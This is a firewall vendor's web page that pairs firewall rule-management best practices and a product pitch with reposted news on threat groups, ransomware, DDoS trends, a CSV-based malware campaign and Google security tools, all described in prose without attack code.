Firewall Security Management

Firewall Security Management

20 TOP MOST PROBLEMS IN FIREWALLS WHICH IMPACT BUSINESS More »

Firewall Security Management

Firewall Security Management

Firewall Hardening Checklist More »

Firewall Security Monitoring

Firewall Security Monitoring

Giving You a Proactive Approach to Your Cyber security with Security Monitoring More »

Best TOP Enterprise Network Firewalls

Best TOP Enterprise Network Firewalls

List of Top Firewall Providers Company / Companies in India More »

 

Tag Archives: Cyber Security Company

Cyber Security Company in India

Cyber Security Company in India

You shall not pass!
Keep your network safe from hackers.

Cyber Security Company in India

Cyber Security Company in India

Your firewall is the first line of defense against security threats, but as you may already know, simply adding firewall devices and security modules to your network doesn’t ensure your network is more secure. You need to regularly watch and analyze your firewall’s sys logs and configurations, and optimize its performance to protect your network.

The heart of any firewall’s performance is its rules and policies. If not managed properly, these can leave your  network vulnerable to attacks.

Gartner predicts that 99 percent of exploited vulnerabilities will continue to be ones known by security and IT professionals for at least one year. Gartner concludes that the best and cheapest way to mitigate cyber attacks
caused by known vulnerabilities is by removing them altogether with regular patching.

For many security admins, maintaining optimal rule performance is a daunting task. Businesses are demanding that networks perform faster, leaving security admins balancing on the thin line separating speed and security. With these challenges in mind, here are some firewall best practices that can help security admins handle the conundrum of speed vs. security.

Firewall best practices

1. Document firewall rules and add comments to explain special rules.

It’s critical for everyone in an IT team to have visibility over all the rules that have been written. Along with the list of rules, it’s important to record: It’s better to be safe than sorry; it’s good practice to start off writing firewall rules with a “deny all” rule. This helps protect your network from manual errors. After testing and deploying the rules, it’s a good idea to special rules.

  • The purpose of a rule.
  • The name of the security admin who wrote the rule, along with date of creation.
  • The users and services affected by the rule.
  • The devices and interfaces affected by the rule.
  • Rule expiration date.

You can record this information as comments when creating a new rule or modifying an existing rule. The first thing you should do, if you haven’t already, is review all the existing rules, and document the above information wherever possible. Though this might be a time-consuming task, you’ll only have to do it once, and it’ll end up saving you a lot of time when auditing and adding new rules in the long run.

2. Reduce over-permissive rules and include “deny all or deny rest” wherever necessary.

It’s better to be safe than sorry; it’s good practice to start off writing firewall rules with a “deny all” rule. This helps protect your network from manual errors. After testing and deploying the rules, it’s a good idea to include a “deny rest” at the bottom. This ensures that your firewall allows only the required traffic and blocks the rest. You’ll also want to avoid using over-permissive rules like “allow any” as this can put your network at risk.

Permissive rules give users more freedom, which can translate into granting users access to more resources than they need to perform business-related functions. This leads to two types of problems:

  • Under or overutilized network bandwidth.
  • Increased exposure to potentially malicious sites.

Restrict over-permissive rules, and avoid these issues altogether.

3. Review firewall rules regularly. Organize firewall rules to maximize speed and performance.

As years go by and new policies are defined by different security admins, the number of rules tends to pile up. When new rules are defined without analyzing the old ones, these rules become redundant and can contradict each other, causing anomalies that negatively affect your firewall’s performance. Cleaning up unused rules on a regular basis
helps avoid clogging up your firewall’s processor, so it’s important to periodically audit rules as well as remove duplicate rules, anomalies, and unwanted policies.

Placing the most used rules on top and moving the lesser-used rules to the bottom helps improve the processing capacity of your firewall. This is an activity that should be performed periodically, as different types of rules are used at different times.

4. Check the health of your rules with a penetration test.

A penetration test is a simulated cyber attack against your computer system that checks for exploitable vulnerabilities. Just like how cars undergo crash tests to detect holes in the safety design, periodic penetration tests on your firewall will help you identify areas in your network’s security that are vulnerable.

5. Automate security audits.

A security audit is a manual or systematic measurable technical assessment of the firewall. Given that it consists of a combination of manual and automated tasks, auditing and recording the results of these tasks on a regular basis is essential. You need a tool that can both automate tasks and record results from manual tasks. This will help track
how configuration changes impact the firewall.

6. Implement an end-to-end change management tool.

The key to efficient policy management is an end-to-end change management tool that can track and record requests from start to finish. A typical change procedure might involve the following steps:

End-to-end configuration change monitoring

User request = > Request approval = >  Testing = > Deployment = > Validation

  • A user raises a request for a particular change.
  • The request is approved by the firewall or network security team, and all the details on who approves the request are recorded for future reference.
  • After approval, the configuration is tested to confirm whether changes in the firewall will have the desired effect without causing any threat to the existing setup.
  • Once the changes are tested, the new rule is deployed into production.
  • A validation process is performed to ensure that the new firewall settings are operating as intended.
  • All changes, reasons for changes, time stamps, and personnel involved are recorded.

7. Lay out an extensive, real-time alert management plan.

A real-time alert management system is critical for efficient firewall management. You need to:

  • Monitor the availability of the firewall in real time. If a firewall goes down, an alternate firewall needs to immediately go up so all traffic can be routed through this firewall for the time being.
  • Trigger alarms when the system encounters an attack so that the issue can be quickly rectified.
  • Set alert notifications for all the changes that are made. This will help security admins keep a close eye on every change as it happens.

8. Retain logs as per regulations.

You need to retain logs for a stipulated amount of time depending on which regulations you need to comply with. Below are some of the major compliance standards along with the retention period required for each regulation.

Regulation

Retention requirement

PCI DSS

1 year

ISO 27001

3 years

NIST

3 years

NERC CIP

3 years

HIPAA

7 years

FISMA

3 years

GLBA

6 years

SOX

7 years

Different countries have different regulations on how long logs need to be stored for legal and auditing purposes. You should check with your legal team on which regulations your business needs to comply with. Regular internal audits, combined with compliance checks for different security standards, are important aspects of maintaining a healthy network. Every company will follow different compliance standards based on the industry that business is in. You can automate compliance checks and audits to run on a regular basis to ensure you’re meeting industry standards.

9. Periodically check for security compliance.

Regular internal audits, combined with compliance checks for different security standards, are important aspects of maintaining a healthy network. Every company will follow different compliance standards based on the industry that business is in. You can automate compliance checks and audits to run on a regular basis to ensure you’re meeting
industry standards.

10. Upgrade your firewall software and firmware.

No network or firewall is perfect, and hackers are working around the clock to find any loopholes they can. Regular software and firmware updates to your firewall help eliminate known vulnerabilities in your system. Not even the best set of firewall rules can stop an attack if a known vulnerability hasn’t been patched.

 

Firewall Analyzer can help in adhering to these firewall best practices.

1. Rule Management:

Policy Overview: Manually documenting all firewall rules and reviewing them on a regular basis is an arduous and time-consuming task. To solve this issue, you can use Firewall Analyzer to fetch the entire set of rules written for your firewall. To simplify review, you can also filter rules on the following criteria:

• Allowed and denied rules.
• Inbound and outbound rules.
• Inactive rules.
• Rules with logging disabled.
• Over-permissive, any-to-any rules.

Policy Optimization: Firewall Analyzer’s Policy Optimization feature identifies shadow rules, redundancy,  generalization, correlation, and grouping anomalies. These anomalies negatively impact firewall performance, and removing them will help you optimize rule efficiency.

Rule Reorder: Firewall Analyzer provides suggestions on rule position by correlating the number of rule hits with rule complexity and anomalies. It can estimate the performance improvement for a suggested change.

Rule Cleanup: Firewall Analyzer provides a detailed list of all unused firewall rules, objects, and interfaces. The Rule Cleanup feature gives you a high-level overview of which rules, objects, and interfaces can be removed or deactivated. As you can see, Firewall Analyzer doesn’t just provide visibility into firewall rules; its in-depth Rule Optimization and Rule Reorder reports help in removing rule anomalies and inefficiencies in rule performance.
Together these reports help in:

• Documenting firewall rules.
• Reviewing firewall rules.
• Optimizing firewall performance.
• Organizing firewall rules to maximize speed.

2. Configuration Change Management: Firewall Analyzer fetches configuration changes from firewall devices and generates the following Change Management report.

This report helps you find who made what changes, when, and why. Firewall Analyzer also sends real-time alerts to your phone when changes happen. This report ensures that all configurations and subsequent changes made in your firewall are captured periodically and stored in a database.

With a combination of ManageEngine’s ServiceDesk Plus for ticketing and Firewall Analyzer for monitoring configuration changes, security admins gain end-to-end change monitoring. This type of end-to-end change monitoring system is critical for avoiding security events caused by human error.

3. Compliance Reports: Firewall Analyzer generates out-of-the-box compliance reports for the following industry standards:

  • Payment Card Industry Data Security Standard (PCI DSS)
  • ISO 27001:2013
  • Firewall best practices
  • NIST Special Publication 800-53
  • NERC’s Critical Infrastructure Protection (CIP) Standards
  • SANS Institutes’ Firewall Checklist

With these reports, you can track your firewall devices’ compliance status in terms of configurations.

4. Configuration Security Audits: Firewall Analyzer can perform security audits on the configuration setup of your firewall and provide detailed reports on any security loopholes. Firewall Analyzer also provides the severity of loopholes, ease of attack due to these loopholes, and a recommendation on how to fix reported issues.

5. Alarm Management: With Firewall Analyzer, you can set alarm notifications for both security and traffic incidents. Firewall Analyzer monitors syslogs, and sends out a notification whenever an alarm threshold trigger is passed. Alert notifications can either be sent via email or SMS. Firewall Analyzer’s alarms help you identify security and traffic events as soon as they occur.

6. Log Retention: With Firewall Analyzer, you can either retain logs in the database or the archive. You can also set a time period for log retention to save disk space and improve performance; after all, disk space requirements can exceed 10TB if log data needs to be retained for a full year.

Continuously monitoring and reviewing your firewall rules, configuration and logs play an important role in securing your network.

IT Monteur use the ManageEngine’s Firewall Analyzer,  and help you for

  • Document and review firewall rules.
  • Organize firewall rules to maximize speed.
  • Monitor all configuration changes made to the firewall.
  • Perform forensic analysis on firewall logs.
  • Set alarm notifications for traffic and security anomalies.
  • Generate compliance reports and perform security audits.

To maintain your firewall rules and adhere to the best practices, Please contact us on

Sales :+91 958 290 7788 | Support : 0120 2631048

Register & Request Quote | Submit Support Ticket

 

 

The tale of the prolific Cobalt threat group’s massive phishing campaigns against financial institutions

  • The cybercriminal group ‘Cobalt’ has been named after its penetration testing tool ‘Cobalt Strike’.
  • The threat group has targeted several banks and financial institutions across countries such as Armenia, Bulgaria, Belarus, Estonia, Georgia, Kyrgyzstan Moldova, the Netherlands, Poland, Romania, Russia, Spain, Britain, Malaysia, and more.

Cobalt group was first spotted in 2016. The cybercriminal group has been named after the penetration testing tool ‘Cobalt Strike’ used by them to move from infected computers in banks’ networks to specialized servers that control ATM machines.

The group was arrested in Spain in March 2018 for attacking almost 100 banks across 40 countries and stealing over 1 billion Euros. The malware and tools used by the threat group include Cobalt Strike, CobInt, SpicyOmlette, Threadkit exploit kit, and More_eggs.

Cobalt group’s attack against ATM machines

In November 2016, cybercriminals have raided ATM machines across Europeusing the technique ‘Jackpotting’ that forces infected ATM machines to dispense cash by installing malware on the machine’s computer. The attack has affected Diebold Nixdorf and NCR Corp, two of the world’s largest ATM makers.

This attack has affected almost 14 countries including Armenia, Bulgaria, Belarus, Estonia, Georgia, Kyrgyzstan, Moldova, the Netherlands, Poland, Romania, Russia, Spain, Britain, and Malaysia. Researchers noted that this attack has been conducted by a threat actor group named Cobalt.

Cobalt targeted banks via a spear phishing campaign

In November 2017, the Cobalt group targeted banks via a spear phishing campaign. The phishing emails sent to targeted banks contained RTF attachments with an exploit for CVE-2017-8759. Once victims open and download the attachment, the malicious code downloads and executes the Cobalt Strike tool. The tool then connects to the Command and Control server operated by the Cobalt gang.

After the RCE vulnerability (CVE-2017-8759), the same month, the Cobalt group started targeting banks and financial institutions with phishing emails containing RTF attachments with an exploit for CVE-2017-11882.

Cobalt group revealed its targets – Intentionally or Accidentally?

In its spear phishing email campaign that targeted banks with phishing emails containing RTF attachments, the Cobalt group included the targets’ email address in the email’s ‘To:’ field, instead of including in the email’s BCC field. By doing so, the group let researchers and other victims know the campaign’s targets. The group made this error accidentally or intentionally remains unknown.

Cobalt group arrested but resumes attacks against banks with Cobint malware

The Cobalt threat actor group was arrested in March 2018 in Spain for attacking 100 banks across 40 countries and stealing over 1 billion Euros. However, the Cobalt gang continued its attack against banks. This attack was observed in May 2018 and used ‘CobInt’ malware to target bank employees in Russia and the Commonwealth of Independent States via phishing emails.

The phishing emails purported to come from a “leading antivirus company” and stated that the bank’s systems were in violation of the law. The emails urged recipients to download the attachment and read the document. Upon opening the attachment, the ‘CobInt’ malware infected the bank’s computer system.

Three phishing campaigns in May-July 2018

In the first campaign, the phishing emails purported to be from the European Banking Federation contained a malicious PDF file. This malicious file persuades victims into downloading a weaponized RTF file that contains three exploits. The attackers dropped a JScript backdoor called More_eggs which allowed the attackers to gain remote control of the targeted system.

The second campaign started on June 19 with phishing emails containing a malicious URL. Upon clicking, the malicious URL redirected the victim to a malicious Word doc, which in turn, triggered the infection chain. The targeted organization in this campaign was a major ATM and payment systems manufacturer.

The third campaign, which began on July 10, saw the attackers targeting various businesses with phishing emails sent along with a malicious RTF file packed with exploits that triggered the infection chain.

Cobalt gang distributed SpicyOmelette malware

In September 2018, the Cobalt threat actor group used a new Remote Access Trojan (RAT) dubbed SpicyOmelette to target banks worldwide. This malware is a JavaScript RAT and comes packed with multiple detection-evading features. SpicyOmelette is also capable of stealing system information, checking for antivirus tools and installing additional malware into the system.

The Cobalt Group’s new malware ‘SpicyOmlette’ was used as part of the initial intrusion stage in an attack. The malware was delivered via phishing emails containing a malicious PDF document. Upon clicking the PDF doc, the malicious link redirected the victim to Amazon Web Service (AWS) URL which is controlled by the Cobalt group. This link installed and executed the SpicyOmelette malware onto the victim’s system.

Cobalt was spotted using an updated version of Threadkit exploit kit

In October 2018, researchers spotted Cobalt group leveraging a new version of the Threadkit malware, a macro delivery framework, which was previously used in its 2017 attacks.

The Threadkit malware was distributed via phishing emails containing an RFT Microsoft Office attachment which contained an evolved version of the exploit builder kit. Researchers noted that CobInt, which is the payload of Threadkit, now has an added layer of obfuscation using an XOR routine for decoding the initial payload, making it complex to detect.

Australia parliament hit by cyber-hack attempt

Authorities in Australia say they are investigating an attempt to hack into its parliament’s computer network.

Lawmakers said there was “no evidence” that information had been accessed or stolen, but politicians’ passwords have been reset as a precaution.

Local cyber-security experts have suggested the hack likely came from a foreign state.

Australian PM Scott Morrison said he didn’t intend to comment in depth on “the source or nature of this”.

He said there was “no suggestion” that government agencies or departments had been targeted. MPs and their staff use the parliament network to store emails, among other data.

  • Australia defence data in ‘extensive’ hack
  • ‘Spies hacked’ Australia weather bureau
  • China denies Australia weather ‘hack’

Earlier, senior lawmakers said there was no evidence that the hacking attempt aimed to “disrupt or influence electoral or political processes”.

However, opposition leader Bill Shorten described the incident as a “wake-up call”. It also sparked commentary from other lawmakers.

The Australian government has faced a number of cyber-attacks in recent years, some of which have been attributed in local media to nations such as China.

In 2015 and 2016, there were high-profile attacks on the government’s weather and statistics agencies. In 2011, senior Australian ministers also had their email systems breached.

“It looks like another nation state is behind this attack as well,” said Fergus Hanson of the Australian Strategic Policy Institute, a Canberra-based think tank.

“You would be having access to swathes of correspondence between politicians, staffers and people who run Parliament House – lots of juicy information there.”

Longest DDoS attack since 2015 lasts 329 hours

While the number of DDoS attacks have declined, they have become much more sophisticated, according to a Kaspersky Lab report.

The last quarter of 2018 saw the longest DDoS attack since 2015, lasting 329 hours—almost 2 weeks—according to a Kaspersky Lab report released on Thursday. But the top three countries with the most DDoS attacks are still the same: China in first place (43%), the US in second (29%), and Australia in third (6%).

While the number of DDoS attacks decreased in 2018, the average attack duration increased, the report found. The average length of attacks more than doubled from the beginning of 2018 to the end—from 95 minutes to 218 minutes. These attacks increased in length because they have become more complex and difficult to stop or mitigate, the report added.

The most common complex attack executed included an HTTP component, which requires both time and money to launch, the report said. Both the HTTP flood method and mixed attacks involving an HTTP factor made up approximately 80% of all DDoS attacks for 2018, revealing the success of this strategy.

Since attacks are predicted to become even more specialized in 2019, the report recommended the following three steps to help protect organizations from DDoS attacks:

  • Train and increase IT employees’ awareness of how to respond to DDoS attacks.
  • Prepare the organization’s websites and web applications to handle high traffic volume.
  • Use professional solutions to protect systems against all varieties of DDoS attacks.

The big takeaways for tech leaders:

  • While DDoS attacks decreased in 2018, the complexity of the attacks increased. — Kaspersky Lab, 2019
  • DDoS attacks will only become more complex and specialized in 2019, meaning the enterprise needs to properly prepare. — Kaspersky Lab, 2019

MATRIX RANSOMWARE CHANGES THE RULES AGAIN | HOW MUCH ARE YOU WORTH?

As noted in the SentinelOne-sponsored EMA Security Megatrends 2019 report, the two greatest threats currently facing enterprise are ransomware and ATAs, advanced targeted attacks that have been designed for a specific environment. The last two years have seen an increase in both kinds of threats, as well as their combination: targeted ransomware such as Ryuk, SamSam, and now Matrix.

Matrix variants have been observed before, but a recent report notes that Matrix has moved firmly into the targeted realm. This development suggests they have taken lessons from their malware brothers-in-arms and have even added a new twist, as we explain in this post.

The Matrix Ransomware

Matrix targets endpoints through Windows Remote Desktop (RDP) services, likely by brute forcing passwords of internet-connected computers to gain entry and spread.

On execution, the malware looks for and encrypts certain types of files, as shown below:

Image of Matrix filetype extensions

The Matrix ransomware obfuscates the original filename and appends its own custom extension to it, typically with either an email address-style syntax such as .[RestoreFile@qq.com] or an uppercase suffix such as .MTXLOCK. At least 30 different file extensions are known, and there is no known public decryptor for the Matrix malware at this time.

As is common with ransomware, Matrix attempts to delete the snapshots automatically created by Windows Volume Shadow Copy service (VSS) to prevent the user or backup software from easily restoring to a known good point.

The Matrix Revolution

At this point in any ransomware story, you would normally expect there to be a ransom note demanding a certain amount of bitcoin. But that’s where the Matrix ransomware shakes things up. The malware authors have dispensed with the convention of a ransom note demanding a specific fee in cryptocurrency. Instead, they aim to capitalise on their tactic of using a targeted attack.

The criminals first ask the victim to send a few samples of their encrypted files, between 3 and 5, along with the KEYIDS.KLST file deposited by the malware on the victim’s Desktop. The attackers then privately decrypt the user’s files, determining who the victim is and what kind of data they are likely to have lost. They then contact the victim with a ransom demand, presumably based on their evaluation of the victim’s resources and the value of the data.

As we pointed out earlier, this is particularly brutal on the enterprise. In a typical opportunistic ransomware attack, the attackers have no idea – and little concern – who their victims are or what data have been rendered inaccessible. Everybody gets hit for the same amount. The Matrix ransomware instead sets a variable price based on the attackers’ own assessment of the worth of the victim. The bigger the fish, the bigger the prize. Although one researcher posing as a victim reported that the criminals became increasingly desperate and started lowering their demand as time went on, it’s not certain that they would follow the same pattern with an enterprise victim.

The Matrix malware authors have also potentially started a new trend by demanding the bitcoin equivalent of a dollar amount rather than a fixed bitcoin amount. This puts the problem of fluctuations in cryptocurrency value firmly in the buyer’s court. Concern about volatile prices could also indicate the criminals intend to cash out in the short-term.

Matrix Reloaded

Some reports suggest that Matrix ransomware attempts to disable Sophos security software. That’s not uncommon these days. Time was most malware would rather abort than try to take on AV software head-to-head. The risk of getting their signatures caught and publicly disseminated was too great. But times have changed. Security solutions that rely on that kind of technology have become less intimidating to malware authors. The prize of execution is too great, particularly with AV bypassesand vulnerabilities becoming increasingly known.

Here at SentinelOne, we decided to load up the Matrix and give it a run for its (or our?) money. We even decided to give it a head start. We set the SentinelOne policy to its weaker “detect only” setting rather than the usual “Protect” policy which blocks the malware automatically without user intervention. With the “detect only” policy, the SentinelOne agent only issues a warning on detection, but otherwise allows malware to execute as the authors intended. If you’re wondering why we would load ransomware onto one of our endpoints and let it encrypt all our files, watch the video to find out!

Conclusion

As the video demonstrates, SentinelOne and the endpoint it was protecting came out the clear winners. With no loss of data and immediate rollback, SentinelOne customers can be assured that they are protected from targeted attacks by Matrix ransomware. Even better, customers using SentinelOne on the default “Protect” policy would see the automated detection and response block the ransomware on the local machine.


Attackers rely on Google Sheets to spread malware through CSV files

  • The malware appears to be a variant of the infamous NanoCore trojan.
  • CSV files containing the malware payload circumvent Google filters using Google Sheets as a distribution method.

A unique malware that uses Google Sheets has been discovered by well-known cyber security researcher Marco Ramili. The malware is found to be an improved version of the NanoCore RAT detected in 2014. It seems that attackers write malicious code in the cells of CSV files to automatically inject the system with the malware.

Ramili who received a spam mail containing this CSV file, mentioned that one of the cells had an executable command. “A series of empty fields preceding a final and fake formula piping a CMD.exe command is spawned. By using the bitsadmin technique the attacker downloads a file called now.exe and stores it into a temporary system folder for later execution,” he said.

Google Sheets as a malware vector

Earlier, attackers relied on desktop applications such as Microsoft Excel, LibreOffice and Apache OpenOffice due to the reason that they supported Dynamic Data Exchange (DDE). This feature/bug was the main exploit for threat actors. OpenOffice and LibreOffice patched this vulnerability in versions 4.1.1 and 4.3.1 respectively.

However, Microsoft Excel only introduced two user warnings, while still allowing this malicious behavior to exist. The warnings in Microsoft Excel are not effective enough as they only ask the users if they trust the source of the file.

In case of files shared through Google Sheets, normal users are likely to consider the file trustworthy, thus exposing themselves to the malware lying in the file if they download and open it locally with Excel.

Modus Operandi

The attackers bypass Google security filters by injecting malicious code in CSV files which are not heavily scanned by Google. Then they share this file with unsuspecting users, asking them to download and open it Microsoft Excel, citing compatibility issues.

Many users fall for this trick and download the file to open it locally on their device. Thus, Google Sheets acts as a malware dropper. As soon as they open it locally, Microsoft Excel becomes the malware executor.

Though the issue has been reported to Google by the security researcher, it has not been considered as a security bug by the company.

Google adds Password Checkup Chrome extension

Google has rolled out a new Chrome extension that will inform users if their passwords have been compromised.

The service, which was introduced as part of Google’s Safer Internet Day offerings, is called Password Checkup. The Chrome extension checks a person’s username and password against a list of four billion credentials that are known to be compromised. If a match occurs the extension will automatically warn the user and suggest the password in question be changed.

“We built Password Checkup so that no one, including Google, can learn your account details. To do this, we developed privacy-protecting techniques with the help of cryptography researchers at both Google and Stanford University,” Google said in a blog post.

The extension is now available.

Google has also implemented an additional layer of security called Cross Account Protection. This security service, which the company already supplies to Google accounts, is now being extended to apps and websites where people use Google Sign In to gain access. 

Websites that adopt the service will receive a notification if a user’s credentials have been exposed so the third-party site can implement the proper security protocols and notify the individual.

“We created Cross Account Protection by working closely with other major technology companies, like Adobe, and the standards community at the Internet Engineering Task Force (IETF) and OpenID Foundation to make this easy for all apps to implement,” Google said, adding that it is included by default for app developers using Firebase or Google Cloud Identity for Customers & Partners.

Google releases February 2019 security patch for Pixel devices, Essential Phone gets updated too

Google has started pushing out latest monthly Android security update for its Pixel smartphones and Pixel C tablet. On Monday, Google Pixel 3, Pixel 3 XL, Pixel 2, Pixel 2 XL, Pixel, Pixel XL, and Pixel C devices got their latest February 2019 security patch along with bug fixes. Parallely, Essential has also rolled out the latest February 2019 security update for Essential Phone as well.

Google has also put up OTA images and factory images of the Android security update for Pixel devices. The changelog notes that there were 15 issues previously, but it didn’t get any report of customers being affected. Now, these issues have been fixed. Unlike previous patches, this one does not include any functional update.

“The most severe of these issues is a critical security vulnerability in Framework that could allow a remote attacker using a specially crafted PNG file to execute arbitrary code within the context of a privileged process. The severity assessment is based on the effect that exploiting the vulnerability would possibly have on an affected device, assuming the platform and service mitigations are turned off for development purposes or if successfully bypassed. We have had no reports of active customer exploitation or abuse of these newly reported issues,” noted Google on Android Security Bulletin.

At the same time, Essential has tweeted out about the update for Essential Phone. It has noted that Essential Phone’s February’s security patch is rolling out now, so users should keep an eye out.

A month ago, Google’s January 2019 Android security update brought fixes for a lot of issues and security vulnerabilities at the kernel and system level. Notably, the latest Pixel 3 and Pixel 3 XL also got enhanced audio quality while recording videos.

Google’s New Tool Alerts When You Use Compromised Credentials On Any Site

With so many data breaches happening almost every week, it has become difficult for users to know if their credentials are already in possession of hackers or being circulated freely across the Internet.

Thankfully, Google has a solution.

Today, February 5, on Safer Internet Day, Google launches a new service that has been designed to alert users when they use an exact combination of username and password for any website that has previously been exposed in any third-party data breach.

The new service, which has initially been made available as a free Chrome browser extension called Password Checkup, works by automatically comparing the user’s entered credential on any site to an encrypted database that contains over 4 billion compromised credentials.

If the credentials are found in the list of compromised ones, Password Checkup will prompt users to change their password.

Wondering if Google can see your login credentials? No, the company has used a privacy-oriented implementation that keeps all your information private and anonymous by encrypting your credentials before checking them against its online database.

You can also check this easy 4-step visual explanation to learn more about how it works under the hood.

The Chrome browser extension, Password Checkup, is available from today, and anyone can download it for free.

Besides launching the new Chrome extension, Google also lists five Official Security Tips which includes keeping your software up-to-date, using unique passwords for every site, taking the Google security checkup, setting up a recovery phone number or email address, and making use of two-factor authentication.

Chrome users can follow these security tips to keep themselves safe on the Internet.

Attackers Use CoAP for DDoS Amplification

Attackers recently started abusing the Constrained Application Protocol (CoAP) for the reflection/amplification of distributed denial of service (DDoS) attacks, NETSCOUT warns. 

CoAP is a simple UDP protocol designed for low-power computers on unreliable networks that appears similar to HTTP, but which operates over UDP (User Datagram Protocol) port 5683. The protocol is mainly used by mobile phones in China, but is also present in Internet of Things (IoT) devices.

A DDoS attack leveraging CoAP begins with scans for devices that can be abused, and continues with a flood of packets spoofed with the source address of their target. At the moment, the attackers appear to have only basic knowledge of the protocol, but attacks could become more sophisticated.

According to NETSCOUT’s security researchers, the scanning for the CoAP protocol has been constant, with almost all GET requests for “/.well-known/core”. In January 2019, however, the researchers noticed a spike in the number of DDoS attacks leveraging the protocol. 

The average amplification factor for CoAP is 34 and the vast majority of Internet-accessible CoAP devices reside in China and utilize a mobile peer-to-peer network, the researchers reveal. With CoAP devices transient by nature and their addresses changing within weeks, attackers need to continually rescan to find IPs to abuse. 

Even so, it is possible for a threat actor to build a list of IPs that respond to CoAP, and then abuse these devices to continually send a flood of packets with a spoofed source address of the intended target, NETSCOUT says. 

The DDoS attacks leveraging CoAP hit targets “geographically and logically well distributed, with little commonality between them.” The attacks last on average just over 90 seconds and feature around 100 packets per second.

The security researchers found 388,344 CoAP devices on the Internet, with 81% of them located in China, but also some discovered in Brazil, Morocco, South Korea, and the United States. Most of the devices in China responded to /.well-known/core with a QLC Chain response (a peer-to-peer network). 

Given that the IP address of CoAP devices will change often, the vast majority of devices would have a different IP address within two weeks. This means that CoAP is less efficient in organizing DDoS attacks compared to SSDP, which boasts a similar amplification factor (but devices don’t move on the network as often). 

Although there are around 12 times as many SSDP devices accessible on the Internet compared to CoAP, attackers still decided to add the CoAP reflection/amplification DDoS vector to their arsenal, meaning that the protocol is likely to continue being abused in attacks. 

“With the vast majority of CoAP devices being located in China and running QLC Chain, it appears that the currently-abusable CoAP reflectors/amplifiers are part of a limited-scope software monoculture that will likely change as CoAP grows in popularity. The initial wave of attacks utilizes well known behavior of the protocol but there are other features, perhaps not as widely implemented, that could make CoAP even more effective,” NETSCOUT concludes. 

Firewall Company | Firewall Company India | Firewall Provider India | Firewall Company